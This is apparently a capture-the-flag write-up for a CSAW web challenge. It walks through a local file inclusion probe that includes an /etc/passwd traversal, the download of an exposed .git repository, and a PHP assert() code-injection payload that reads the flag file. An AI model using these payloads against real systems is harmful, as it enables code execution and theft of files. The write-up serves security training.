Description:
Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/
Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.
The following table describes the possible respond pages:
| URL |
| http://web.chal.csaw.io:8000/?page=home |
| http://web.chal.csaw.io:8000/?page=about |
| http://web.chal.csaw.io:8000/?page=contact |
| http://web.chal.csaw.io:8000/?page=Megabeets |
| http://web.chal.csaw.io:8000/?page=flag |
| http://web.chal.csaw.io:8000/?page=../../../../etc/passwd |
Looking at the source code i saw the following comment:
<!--<li ><a href="?page=flag">My secrets</a></li> -->
Ok, I need to get the “flag” page but any LFI technique I tried didn’t work. I thought about something else, In the “about” page the creator of the site mentioned that it was built using git. So let’s see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists so I downloaded the repository using DVCS-RIPPER.
You can find index.php here.
So the page is using assert() which is vulnerable to Command Injection attack. After a little trial and error I came up with the answer:
(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content
And received the flag:
string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!
If you try entering [the url][2] in a browser, look in the source of the page (CTRL+U), the flag is commented.
[2]: http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents(’templates/flag.php’));// Comment the rest of the line
Eat Veggies
